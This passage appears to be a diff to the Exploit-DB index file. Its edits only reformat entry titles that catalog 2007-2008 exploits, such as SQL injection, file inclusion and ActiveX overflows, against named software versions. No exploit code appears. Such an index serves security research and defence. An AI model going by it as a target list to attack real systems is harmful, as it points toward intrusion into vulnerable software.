NCTAudioFile2.AudioFile ActiveX Remote Overflow Exploit",2007-04-13,InTeL,windows,remote,0 3729,platforms/php/webapps/3729.txt,"qdblog 0.4 (SQL Injection/lfi) Multiple Vulnerabilities",2007-04-13,Omni,php,webapps,0 3730,platforms/linux/local/3730.txt,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls) Local Overflow Exploit (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0 3731,platforms/php/webapps/3731.php,"Frogss CMS <= 0.7 - Remote SQL Injection Exploit",2007-04-13,Kacper,php,webapps,0 @@ -3461,7 +3461,7 @@ id,file,description,date,author,platform,type,port 3805,platforms/php/webapps/3805.txt,"Firefly 1.1.01 (doc_root) Remote File Inclusion Vulnerabilities",2007-04-26,"Alkomandoz Hacker",php,webapps,0 3806,platforms/php/webapps/3806.txt,"EsForum 3.0 (forum.php idsalon) Remote SQL Injection Vulnerability",2007-04-26,"ilker Kandemir",php,webapps,0 3807,platforms/linux/dos/3807.c,"MyDNS 1.1.0 - Remote Heap Overflow PoC",2007-04-27,mu-b,linux,dos,0 -3808,platforms/windows/remote/3808.html,"Internet Explorer NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow Exploit 2",2007-04-27,shinnai,windows,remote,0 +3808,platforms/windows/remote/3808.html,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow Exploit (2)",2007-04-27,shinnai,windows,remote,0 3809,platforms/php/webapps/3809.txt,"burnCMS <= 0.2 (root) Remote File Inclusion Vulnerabilities",2007-04-27,GoLd_M,php,webapps,0 3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX (iPIX-ImageWell-ipix.dll) BoF Exploit",2007-04-27,"Umesh Wanve",windows,remote,0 3811,platforms/windows/local/3811.c,"IrfanView <= 4.00 - (.iff) Buffer Overflow Exploit",2007-04-27,Marsu,windows,local,0 @@ -3477,11 +3477,11 @@ id,file,description,date,author,platform,type,port 3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g proxy.c logurl() Remote Buffer Overflow Exploit (linux)",2007-04-30,vade79,linux,remote,0 3822,platforms/windows/remote/3822.c,"3proxy 0.5.3g proxy.c logurl() Remote Buffer Overflow Exploit (Win32)",2007-04-30,vade79,windows,remote,0 3823,platforms/windows/local/3823.c,"Winamp <= 5.34 - (.mp4) Code Execution Exploit",2007-04-30,Marsu,windows,local,0 -3824,platforms/php/webapps/3824.txt,"Wordpress plugin wp-Table <= 1.43 (inc_dir) RFI Vulnerability",2007-05-01,K-159,php,webapps,0 -3825,platforms/php/webapps/3825.txt,"Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability",2007-05-01,K-159,php,webapps,0 +3824,platforms/php/webapps/3824.txt,"Wordpress plugin wp-Table <= 1.43 - (inc_dir) RFI Vulnerability",2007-05-01,K-159,php,webapps,0 +3825,platforms/php/webapps/3825.txt,"Wordpress plugin wordTube <= 1.43 - (wpPATH) RFI Vulnerability",2007-05-01,K-159,php,webapps,0 3826,platforms/windows/dos/3826.html,"PowerPoint Viewer OCX 3.2 (ActiveX Control) Denial of Service Exploit",2007-05-01,shinnai,windows,dos,0 3827,platforms/php/webapps/3827.txt,"Sendcard <= 3.4.1 (sendcard.php form) Local File Inclusion Vulnerability",2007-05-01,ettee,php,webapps,0 -3828,platforms/php/webapps/3828.txt,"Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability",2007-05-01,Crackers_Child,php,webapps,0 +3828,platforms/php/webapps/3828.txt,"Wordpress plugin myflash <= 1.00 - (wppath) RFI Vulnerability",2007-05-01,Crackers_Child,php,webapps,0 3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g proxy.c logurl() Remote Overflow Exploit (exec-shield)",2007-05-02,Xpl017Elz,linux,remote,0 3830,platforms/windows/dos/3830.html,"Excel Viewer OCX 3.1.0.6 - Multiple Methods Denial of Service Exploit",2007-05-02,shinnai,windows,dos,0 3831,platforms/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - (download.asp File) File Disclosure Vulnerability",2007-05-02,Dj7xpl,asp,webapps,0 @@ -3611,7 +3611,7 @@ id,file,description,date,author,platform,type,port 3957,platforms/php/webapps/3957.php,"AlstraSoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 3958,platforms/php/webapps/3958.php,"AlstraSoft Template Seller Pro <= 3.25 Admin Password Change Exploit",2007-05-20,BlackHawk,php,webapps,0 3959,platforms/php/webapps/3959.php,"AlstraSoft Template Seller Pro <= 3.25 - Remote Code Execution Exploit",2007-05-20,BlackHawk,php,webapps,0 -3960,platforms/php/webapps/3960.php,"Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit",2007-05-21,waraxe,php,webapps,0 +3960,platforms/php/webapps/3960.php,"Wordpress 2.1.3 - admin-ajax.php SQL Injection Blind Fishing Exploit",2007-05-21,waraxe,php,webapps,0 3961,platforms/windows/remote/3961.html,"LeadTools Raster Variant (LTRVR14e.dll) Remote File Overwrite Exploit",2007-05-21,shinnai,windows,remote,0 3962,platforms/php/webapps/3962.txt,"Ol Bookmarks Manager 0.7.4 (root) Remote File Inclusion Vulnerabilities",2007-05-21,"ThE TiGeR",php,webapps,0 3963,platforms/php/webapps/3963.txt,"TutorialCMS <= 1.01 - Authentication Bypass Vulnerability",2007-05-21,Silentz,php,webapps,0 @@ -3644,7 +3644,7 @@ id,file,description,date,author,platform,type,port 3990,platforms/php/webapps/3990.txt,"vBulletin vBGSiteMap 2.41 (root) Remote File Inclusion Vulnerabilities",2007-05-25,"Cold Zero",php,webapps,0 3991,platforms/php/webapps/3991.txt,"OpenBASE 0.6a (root_prefix) Remote File Inclusion Vulnerabilities",2007-05-25,DeltahackingTEAM,php,webapps,0 3992,platforms/php/webapps/3992.txt,"FlaP 1.0b (pachtofile) Remote File Inclusion Vulnerabilities",2007-05-25,"Mehmet Ince",php,webapps,0 -3993,platforms/windows/remote/3993.html,"Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote BoF Exploit",2007-05-26,rgod,windows,remote,0 +3993,platforms/windows/remote/3993.html,"Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote BoF Exploit",2007-05-26,rgod,windows,remote,0 3994,platforms/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion Vulnerabilities",2007-05-26,"ThE TiGeR",php,webapps,0 3995,platforms/php/webapps/3995.txt,"TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability",2007-05-26,"Mehmet Ince",php,webapps,0 3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)",2007-05-26,fabio/b0x,windows,remote,80 @@ -3653,7 +3653,7 @@ id,file,description,date,author,platform,type,port 3999,platforms/php/webapps/3999.txt,"Vistered Little 1.6a (skin) Remote File Disclosure Vulnerability",2007-05-28,GoLd_M,php,webapps,0 4000,platforms/php/webapps/4000.txt,"wanewsletter <= 2.1.3 - Remote File Inclusion Vulnerability",2007-05-28,Mogatil,php,webapps,0 4001,platforms/windows/local/4001.cpp,"UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow Exploit",2007-05-28,n00b,windows,local,0 -4002,platforms/windows/local/4002.py,"UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow Exploit 2",2007-05-28,"Thomas Pollet",windows,local,0 +4002,platforms/windows/local/4002.py,"UltraISO <= 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow Exploit (2)",2007-05-28,"Thomas Pollet",windows,local,0 4003,platforms/php/webapps/4003.sh,"Joomla Component Phil-a-Form <= 1.2.0.0 - SQL Injection Exploit",2007-05-28,CypherXero,php,webapps,0 4004,platforms/php/webapps/4004.php,"Inout Search Engine (all version) Remote Code Execution Exploit",2007-05-29,BlackHawk,php,webapps,0 4005,platforms/php/webapps/4005.txt,"AdminBot 9.0.5 (live_status.lib.php ROOT) RFI Vulnerability",2007-05-29,"ThE TiGeR",php,webapps,0 @@ -3673,7 +3673,7 @@ id,file,description,date,author,platform,type,port 4020,platforms/php/webapps/4020.php,"RevokeBB <= 1.0 RC4 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0 4021,platforms/windows/remote/4021.html,"Zenturi ProgramChecker ActiveX (sasatl.dll) Remote BoF Exploit",2007-06-01,shinnai,windows,remote,0 4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion Exploit",2007-06-01,GoLd_M,php,webapps,0 -4023,platforms/windows/remote/4023.html,"Internet Explorer 6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit",2007-06-02,rgod,windows,remote,0 +4023,platforms/windows/remote/4023.html,"Microsoft Internet Explorer 6 / Provideo Camimage - (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit",2007-06-02,rgod,windows,remote,0 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit",2007-06-02,n00b,windows,local,0 4025,platforms/php/webapps/4025.php,"Quick.Cart <= 2.2 RFI/LFI Remote Code Execution Exploit",2007-06-02,Kacper,php,webapps,0 4026,platforms/php/webapps/4026.php,"PNphpBB2 <= 1.2 - (index.php c) Remote SQL Injection Exploit",2007-06-03,Kacper,php,webapps,0 @@ -3689,7 +3689,7 @@ id,file,description,date,author,platform,type,port 4036,platforms/php/webapps/4036.php,"PBLang <= 4.67.16.a Remote Code Execution Exploit",2007-06-06,Silentz,php,webapps,0 4037,platforms/php/webapps/4037.pl,"Comicsense 0.2 (index.php epi) Remote SQL Injection Exploit",2007-06-06,Silentz,php,webapps,0 4038,platforms/multiple/dos/4038.pl,"DRDoS - Distributed Reflection Denial of Service",2007-06-06,whoppix,multiple,dos,0 -4039,platforms/php/webapps/4039.txt,"Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit",2007-06-06,Slappter,php,webapps,0 +4039,platforms/php/webapps/4039.txt,"Wordpress 2.2 - (xmlrpc.php) Remote SQL Injection Exploit",2007-06-06,Slappter,php,webapps,0 4040,platforms/asp/webapps/4040.txt,"Kartli Alisveris Sistemi 1.0 - Remote SQL Injection Vulnerability",2007-06-06,kerem125,asp,webapps,0 4041,platforms/php/webapps/4041.htm,"NewsSync for phpBB 1.5.0rc6 - Remote File Inclusion Exploit",2007-06-07,GoLd_M,php,webapps,0 4042,platforms/windows/remote/4042.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow Exploit",2007-06-07,Excepti0n,windows,remote,0 @@ -3759,7 +3759,7 @@ id,file,description,date,author,platform,type,port 4110,platforms/windows/remote/4110.html,"Avaxswf.dll 1.0.0.1 from Avax Vector - ActiveX Arbitrary Data Write",2007-06-26,callAX,windows,remote,0 4111,platforms/php/webapps/4111.txt,"phpSiteBackup 0.1 (pcltar.lib.php) Remote File Inclusion Vulnerability",2007-06-26,GoLd_M,php,webapps,0 4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1<= 2.2 (index.php3) Remote File Inclusion Vulnerabilities",2007-06-26,g00ns,php,webapps,0 -4113,platforms/php/webapps/4113.pl,"WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit",2007-06-26,"Alexander Concha",php,webapps,0 +4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - (wp-app.php) Arbitrary File Upload Exploit",2007-06-26,"Alexander Concha",php,webapps,0 4114,platforms/php/webapps/4114.txt,"elkagroup Image Gallery 1.0 - Remote SQL Injection Vulnerability",2007-06-26,t0pP8uZz,php,webapps,0 4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 (lang) Local File Inclusion Vulnerabilities",2007-06-27,Katatafish,php,webapps,0 4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 (qti_checkname.php) Local File Inclusion Vulnerability",2007-06-27,Katatafish,php,webapps,0 @@ -3896,7 +3896,7 @@ id,file,description,date,author,platform,type,port 4249,platforms/multiple/dos/4249.rb,"Asterisk < 1.2.22 / 1.4.8 IAX2 channel driver - Remote Crash Exploit",2007-07-31,tenkei_ev,multiple,dos,0 4250,platforms/windows/remote/4250.html,"Yahoo! Widget < 4.0.5 GetComponentVersion() Remote Overflow Exploit",2007-07-31,lhoang8500,windows,remote,0 4251,platforms/windows/dos/4251.html,"Microsoft Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit",2007-07-31,DeltahackingTEAM,windows,dos,0 -4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - (.mpr replay ) Buffer Overflow Exploit",2007-08-01,n00b,windows,local,0 +4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - (.mpr replay) Buffer Overflow Exploit",2007-08-01,n00b,windows,local,0 4253,platforms/php/webapps/4253.pl,"paBugs <= 2.0 Beta 3 (main.php cid) Remote SQL Injection Exploit",2007-08-02,uimp,php,webapps,0 4254,platforms/php/webapps/4254.txt,"AuraCMS [Forum Module] Remote SQL Injection Vulnerability",2007-08-05,k1tk4t,php,webapps,0 4255,platforms/windows/remote/4255.html,"CHILKAT ASP String (CkString.dll <= 1.1) SaveToFile() Inscure Method",2007-08-05,shinnai,windows,remote,0 @@ -3906,8 +3906,8 @@ id,file,description,date,author,platform,type,port 4259,platforms/windows/remote/4259.txt,"Microsoft Visual 6 (VDT70.DLL NotSafe) Stack Overflow Exploit",2007-08-06,DeltahackingTEAM,windows,remote,0 4260,platforms/multiple/dos/4260.php,"PHP mSQL (msql_connect) Local Buffer Overflow PoC",2007-08-06,NetJackal,multiple,dos,0 4261,platforms/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 (showpage.cgi p) Remote File Disclosure",2007-08-06,GoLd_M,cgi,webapps,0 -4262,platforms/windows/local/4262.cpp,"Live for Speed S1/S2/Demo - (.ply ) Buffer Overflow Exploit",2007-08-06,n00b,windows,local,0 -4263,platforms/windows/local/4263.cpp,"Live for Speed S1/S2/Demo - (.spr ) Buffer Overflow Exploit",2007-08-06,n00b,windows,local,0 +4262,platforms/windows/local/4262.cpp,"Live for Speed S1/S2/Demo - (.ply) Buffer Overflow Exploit",2007-08-06,n00b,windows,local,0 +4263,platforms/windows/local/4263.cpp,"Live for Speed S1/S2/Demo - (.spr) Buffer Overflow Exploit",2007-08-06,n00b,windows,local,0 4264,platforms/cgi/webapps/4264.txt,"CartWeaver (Details.cfm ProdID) Remote SQL Injection Vulnerability",2007-08-06,meoconx,cgi,webapps,0 4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory (directory.php cat) SQL Injection Vulnerbility",2007-08-06,t0pP8uZz,php,webapps,0 4266,platforms/multiple/remote/4266.py,"BIND 9 0.3beta - DNS Cache Poisoning Exploit",2007-08-07,posedge,multiple,remote,0 @@ -4041,7 +4041,7 @@ id,file,description,date,author,platform,type,port 4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - (VBTOVSI.DLL 1.0.0.0) File Overwrite Exploit",2007-09-11,shinnai,windows,remote,0 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 (root_path) Remote File Inclusion Vulnerability",2007-09-11,"Rootshell Security",php,webapps,0 4396,platforms/php/webapps/4396.txt,"X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities",2007-09-11,aLiiF,php,webapps,0 -4397,platforms/php/webapps/4397.rb,"Wordpress Multiple Versions Pwnpress Exploitation Tookit (0.2pub)",2007-09-14,"Lance M. Havok",php,webapps,0 +4397,platforms/php/webapps/4397.rb,"Wordpress Multiple Versions - Pwnpress Exploitation Tookit (0.2pub)",2007-09-14,"Lance M. Havok",php,webapps,0 4398,platforms/windows/remote/4398.html,"Microsoft SQL Server Distributed Management Objects BoF Exploit",2007-09-12,96sysim,windows,remote,0 4399,platforms/multiple/remote/4399.html,"Apple Quicktime (Multiple Browsers) Command Execution PoC (0day)",2007-09-12,pdp,multiple,remote,0 4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 (id) Remote SQL Injection Vulnerability",2007-09-13,Houssamix,php,webapps,0 @@ -4173,7 +4173,7 @@ id,file,description,date,author,platform,type,port 4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script Remote SQL Injection Vulnerability",2007-10-13,IRCRASH,php,webapps,0 4528,platforms/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module Remote SQL Injection Vulnerability",2007-10-13,"Mehmet Ince",php,webapps,0 4529,platforms/cgi/webapps/4529.txt,"WWWISIS <= 7.1 (IsisScript) Local File Disclosure / XSS Vulnerabilities",2007-10-13,JosS,cgi,webapps,0 -4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (webdav) Remote File Disclosure Exploit",2007-10-14,eliteboy,multiple,remote,0 +4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (webdav) - Remote File Disclosure Exploit",2007-10-14,eliteboy,multiple,remote,0 4531,platforms/windows/local/4531.py,"jetAudio 7.x (m3u File) Local SEH Overwrite Exploit",2007-10-14,h07,windows,local,0 4532,platforms/linux/dos/4532.pl,"eXtremail <= 2.1.1 memmove() Remote Denial of Service Exploit",2007-10-15,mu-b,linux,dos,0 4533,platforms/linux/remote/4533.c,"eXtremail <= 2.1.1 (LOGIN) Remote Stack Overflow Exploit",2007-10-15,mu-b,linux,remote,4501 @@ -4195,7 +4195,7 @@ id,file,description,date,author,platform,type,port 4549,platforms/php/webapps/4549.txt,"PHP Project Management <= 0.8.10 - Multiple RFI / LFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0 4550,platforms/php/webapps/4550.pl,"BBPortalS <= 2.0 - Remote Blind SQL Injection Exploit",2007-10-21,Max007,php,webapps,0 4551,platforms/php/webapps/4551.txt,"PeopleAggregator <= 1.2pre6-release-53 - Multiple RFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0 -4552,platforms/linux/remote/4552.pl,"Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)",2007-10-21,h3rcul3s,linux,remote,0 +4552,platforms/linux/remote/4552.pl,"Apache Tomcat (webdav) - Remote File Disclosure Exploit (ssl support)",2007-10-21,h3rcul3s,linux,remote,0 4553,platforms/windows/local/4553.php,"PHP 5.x COM functions safe_mode and disable_function bypass",2007-10-22,shinnai,windows,local,0 4554,platforms/php/webapps/4554.txt,"SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability",2007-10-22,BiNgZa,php,webapps,0 4555,platforms/php/webapps/4555.txt,"TOWeLS 0.1 scripture.php Remote File Inclusion Vulnerability",2007-10-22,GoLd_M,php,webapps,0 @@ -4227,7 +4227,7 @@ id,file,description,date,author,platform,type,port 4581,platforms/php/webapps/4581.txt,"Sige 0.1 sige_init.php Remote File Inclusion Vulnerability",2007-10-28,GoLd_M,php,webapps,0 4582,platforms/php/webapps/4582.txt,"teatro 1.6 (basePath) Remote File Include Vulnerability",2007-10-28,"Alkomandoz Hacker",php,webapps,0 4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x (m3u File) Local Stack Overflow Exploit",2007-10-29,TaMBaRuS,windows,local,0 -4584,platforms/windows/local/4584.c,"Kodak Image Viewer -TIF/TIFF Code Execution Exploit PoC (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0 +4584,platforms/windows/local/4584.c,"Kodak Image Viewer - TIF/TIFF Code Execution Exploit PoC (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0 4585,platforms/php/webapps/4585.txt,"MySpace Resource Script (MSRS) 1.21 RFI Vulnerability",2007-10-29,r00t@zapak.com,php,webapps,0 4586,platforms/php/webapps/4586.txt,"ProfileCMS 1.0 - Remote File Upload Vulnerability Shell Upload Exploit",2007-10-29,r00t@zapak.com,php,webapps,0 4587,platforms/php/webapps/4587.txt,"miniBB 2.1 (table) Remote SQL Injection Vulnerability",2007-10-30,irk4z,php,webapps,0 @@ -4235,7 +4235,7 @@ id,file,description,date,author,platform,type,port 4589,platforms/php/webapps/4589.htm,"PHP-AGTC membership system 1.1a Remote Add Admin Exploit",2007-10-30,0x90,php,webapps,0 4591,platforms/php/webapps/4591.txt,"ModuleBuilder 1.0 - (file) Remote File Disclosure Vulnerability",2007-10-31,GoLd_M,php,webapps,0 4592,platforms/php/webapps/4592.txt,"ISPworker 1.21 download.php Remote File Disclosure Vulnerability",2007-10-31,GoLd_M,php,webapps,0 -4593,platforms/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability",2007-11-01,S.W.A.T.,php,webapps,0 +4593,platforms/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress <= 0.4.2b - RFI Vulnerability",2007-11-01,S.W.A.T.,php,webapps,0 4594,platforms/windows/remote/4594.html,"SonicWall SSL-VPN NeLaunchCtrl ActiveX Control Remote Exploit",2007-11-01,krafty,windows,remote,0 4595,platforms/php/webapps/4595.txt,"Synergiser <= 1.2 RC1 - Local File Inclusion / Full Path Disclosure",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 4596,platforms/php/webapps/4596.txt,"Scribe <= 0.2 - Remote PHP Code Execution Vulnerability",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 @@ -4363,7 +4363,7 @@ id,file,description,date,author,platform,type,port 4718,platforms/php/webapps/4718.rb,"SquirrelMail G/PGP Plugin deletekey() Command Injection Exploit",2007-12-11,Backdoored,php,webapps,0 4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make (index.php template) Local File Inclusion Vuln",2007-12-11,MhZ91,php,webapps,0 4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks ActiveX Remote Code Execution Exploit",2007-12-11,porkythepig,windows,remote,0 -4721,platforms/php/webapps/4721.txt,"Wordpress <= 2.3.1 Charset Remote SQL Injection Vulnerability",2007-12-11,"Abel Cheung",php,webapps,0 +4721,platforms/php/webapps/4721.txt,"Wordpress <= 2.3.1 - Charset Remote SQL Injection Vulnerability",2007-12-11,"Abel Cheung",php,webapps,0 4722,platforms/php/webapps/4722.txt,"viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion Vulnerability",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0 4723,platforms/osx/dos/4723.c,"Apple Mac OS X xnu <= 1228.0 - super_blob Local kernel Denial of Service PoC",2007-12-12,mu-b,osx,dos,0 4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 CGI Remote BoF Exploit",2007-12-12,muts,windows,remote,80 @@ -4630,8 +4630,8 @@ id,file,description,date,author,platform,type,port 4989,platforms/php/webapps/4989.txt,"simple forum 3.2 (fd/XSS) Multiple Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0 4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 Numerous Remote SQL Injection Vulnerabilities",2008-01-26,"Charles Hooper",php,webapps,0 4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusion Vulnerabilities",2008-01-26,Stack,php,webapps,0 -4992,platforms/php/webapps/4992.txt,"Wordpress Plugin WP-Cal 0.3 editevent.php SQL Injection Vulnerability",2008-01-27,Houssamix,php,webapps,0 -4993,platforms/php/webapps/4993.txt,"Wordpress plugin fGallery 2.4.1 fimrss.php SQL Injection Vulnerability",2008-01-27,Houssamix,php,webapps,0 +4992,platforms/php/webapps/4992.txt,"Wordpress Plugin WP-Cal 0.3 - editevent.php SQL Injection Vulnerability",2008-01-27,Houssamix,php,webapps,0 +4993,platforms/php/webapps/4993.txt,"Wordpress plugin fGallery 2.4.1 - fimrss.php SQL Injection Vulnerability",2008-01-27,Houssamix,php,webapps,0 4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 pitrig_drop PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 pitrig_truncate PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 xdb.xdb_pitrig_pkg PLSQL Injection (change sys password)",2008-01-28,sh2kerr,multiple,local,0 @@ -4651,11 +4651,11 @@ id,file,description,date,author,platform,type,port 5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 (catid) SQL Injection Vulnerability",2008-01-30,S@BUN,php,webapps,0 5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes (aid) Remote SQL Injection Vulnerability",2008-01-30,S@BUN,php,webapps,0 5012,platforms/php/webapps/5012.pl,"Connectix Boards <= 0.8.2 template_path Remote File Inclusion Exploit",2008-01-30,Houssamix,php,webapps,0 -5013,platforms/php/webapps/5013.php,"Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit",2008-01-30,enter_the_dragon,php,webapps,0 +5013,platforms/php/webapps/5013.php,"Wordpress Plugin Adserve 0.2 - adclick.php SQL Injection Exploit",2008-01-30,enter_the_dragon,php,webapps,0 5014,platforms/php/webapps/5014.txt,"Mambo Component Recipes 1.00 (id) Remote SQL Injection Vulnerability",2008-01-30,S@BUN,php,webapps,0 5015,platforms/php/webapps/5015.txt,"Mambo Component jokes 1.0 (cat) SQL Injection Vulnerability",2008-01-30,S@BUN,php,webapps,0 5016,platforms/php/webapps/5016.txt,"Mambo Component EstateAgent 0.1 - Remote SQL Injection Vulnerability",2008-01-30,S@BUN,php,webapps,0 -5017,platforms/php/webapps/5017.php,"Wordpress Plugin WassUp 1.4.3 (spy.php to_date) SQL Injection Exploit",2008-01-30,enter_the_dragon,php,webapps,0 +5017,platforms/php/webapps/5017.php,"Wordpress Plugin WassUp 1.4.3 - (spy.php to_date) SQL Injection Exploit",2008-01-30,enter_the_dragon,php,webapps,0 5018,platforms/php/webapps/5018.pl,"ibProArcade <= 3.3.0 - Remote SQL Injection Exploit",2008-01-30,RST/GHC,php,webapps,0 5019,platforms/php/webapps/5019.txt,"Coppermine Photo Gallery 1.4.14 - Remote Command Execution Exploit",2008-01-30,waraxe,php,webapps,0 5020,platforms/php/webapps/5020.txt,"Joomla Component ChronoForms 2.3.5 RFI Vulnerabilities",2008-01-30,Crackers_Child,php,webapps,0 @@ -4674,7 +4674,7 @@ id,file,description,date,author,platform,type,port 5035,platforms/php/webapps/5035.txt,"wordpress plugin dmsguestbook 1.7.0 - Multiple Vulnerabilities",2008-02-02,NBBN,php,webapps,0 5036,platforms/windows/dos/5036.pl,"Titan FTP Server 6.03 (USER/PASS) Remote Heap Overflow PoC",2008-02-02,securfrog,windows,dos,0 5037,platforms/php/webapps/5037.txt,"The Everything Development System <= Pre-1.0 - SQL Injection Vuln",2008-02-02,sub,php,webapps,0 -5039,platforms/php/webapps/5039.txt,"Wordpress Plugin Wordspew Remote SQL Injection Vulnerability",2008-02-02,S@BUN,php,webapps,0 +5039,platforms/php/webapps/5039.txt,"Wordpress Plugin Wordspew - Remote SQL Injection Vulnerability",2008-02-02,S@BUN,php,webapps,0 5040,platforms/php/webapps/5040.txt,"BookmarkX script 2007 (topicid) Remote SQL Injection Vulnerability",2008-02-02,S@BUN,php,webapps,0 5041,platforms/php/webapps/5041.txt,"phpShop <= 0.8.1 - Remote SQL Injection / Filter Bypass Vulnerabilities",2008-02-02,"the redc0ders",php,webapps,0 5042,platforms/php/webapps/5042.txt,"BlogPHP 2 - (id) XSS / Remote SQL Injection Exploit",2008-02-02,IRCRASH,php,webapps,0 @@ -4688,7 +4688,7 @@ id,file,description,date,author,platform,type,port 5050,platforms/php/webapps/5050.pl,"A-Blog 2 - (id) XSS / Remote SQL Injection Exploit",2008-02-03,IRCRASH,php,webapps,0 5051,platforms/windows/remote/5051.html,"Yahoo! Music Jukebox 2.2 AddButton() ActiveX Remote BoF Exploit (3)",2008-02-03,Elazar,windows,remote,0 5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid ActiveX mediagrid.dll AddBitmap() BoF Exploit",2008-02-03,Elazar,windows,remote,0 -5053,platforms/php/webapps/5053.txt,"Wordpress Plugin st_newsletter Remote SQL Injection Vulnerability",2008-02-03,S@BUN,php,webapps,0 +5053,platforms/php/webapps/5053.txt,"Wordpress Plugin st_newsletter - Remote SQL Injection Vulnerability",2008-02-03,S@BUN,php,webapps,0 5054,platforms/hardware/dos/5054.c,"MicroTik RouterOS <= 3.2 SNMPd snmp-set Denial of Service Exploit",2008-02-03,ShadOS,hardware,dos,0 5055,platforms/php/webapps/5055.txt,"Joomla Component Marketplace 1.1.1 - SQL Injection Vulnerability",2008-02-03,"SoSo H H",php,webapps,0 5056,platforms/php/webapps/5056.txt,"ITechBids 5.0 (bidhistory.php item_id) Remote SQL Injection Vulnerability",2008-02-04,QTRinux,php,webapps,0 @@ -4701,7 +4701,7 @@ id,file,description,date,author,platform,type,port 5063,platforms/windows/dos/5063.pl,"NERO Media Player <= 1.4.0.35b M3U File Buffer Overflow PoC",2008-02-05,securfrog,windows,dos,0 5064,platforms/php/webapps/5064.txt,"All Club CMS <= 0.0.2 index.php Remote SQL Injection Vulnerability",2008-02-05,ka0x,php,webapps,0 5065,platforms/php/webapps/5065.txt,"Photokorn Gallery 1.543 (pic) SQL Injection Vulnerability",2008-02-05,you_kn0w,php,webapps,0 -5066,platforms/php/webapps/5066.php,"Wordpress MU < 1.3.2 active_plugins option Code Execution Exploit",2008-02-05,"Alexander Concha",php,webapps,0 +5066,platforms/php/webapps/5066.php,"Wordpress MU < 1.3.2 - active_plugins option Code Execution Exploit",2008-02-05,"Alexander Concha",php,webapps,0 5067,platforms/windows/dos/5067.pl,"dBpowerAMP Audio Player Release 2 M3U File Buffer Overflow PoC",2008-02-05,securfrog,windows,dos,0 5068,platforms/php/webapps/5068.txt,"OpenSiteAdmin <= 0.9.1.1 - Multiple File Inclusion Vulnerabilities",2008-02-06,Trancek,php,webapps,0 